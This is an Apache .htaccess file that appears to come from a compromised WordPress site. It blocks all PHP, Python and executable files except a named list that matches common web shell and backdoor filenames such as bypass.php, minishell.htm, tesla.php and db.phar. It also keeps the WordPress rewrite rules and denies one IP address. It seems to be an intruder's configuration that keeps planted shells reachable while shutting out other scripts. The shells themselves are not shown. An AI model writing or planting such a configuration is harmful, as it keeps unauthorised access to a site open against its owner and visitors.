<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(db.php|tesla.php|db.PHP|about.php|db2.php|wp-login.php|edit.php|upload.php|db.phar|404manual.php|indox3.php|image.php|db.php|reset.php|index.php|bypass2.php|css.phtml|admin.php|bypass.php|bypass.htm|minishell.htm|index.html|login.php|ubed.html|sanatic.html)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 138.199.28.38
